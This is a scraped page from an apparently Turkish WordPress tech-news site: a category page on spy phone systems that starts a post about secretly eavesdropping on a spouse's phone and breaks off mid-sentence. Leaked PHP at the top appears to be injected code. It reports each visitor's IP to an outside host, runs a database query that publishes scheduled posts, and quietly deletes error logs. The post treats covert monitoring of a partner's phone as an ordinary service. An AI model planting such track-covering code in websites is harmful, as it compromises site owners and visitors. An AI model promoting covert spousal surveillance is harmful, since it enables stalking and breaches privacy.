$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> casus telefon sistemleri | Teknoloji Haberleri

casus telefon sistemleri kategorisindeki tüm yazılar

Son Yazılar

Eş dinleme nedir ve kimler bu işleme başvurur?

Eş dinleme işlemleri genellikle eşlerinden çeşitli sebeplerle şüphe eden kişiler tarafından başvurulan bir yöntem olarak dikkatleri çekmektedir. Bu yöntemler gizlilikle yürütülen bir takın yöntemler olduğundan, elde edilen sonuçlar her zaman olumlu veya olumsuz dinleme işlemini yaptıran kişilere cevap vermektedir. Gizlilikle yürütülen bu çalışmalarda, dinlenilecek telefon modeli önemli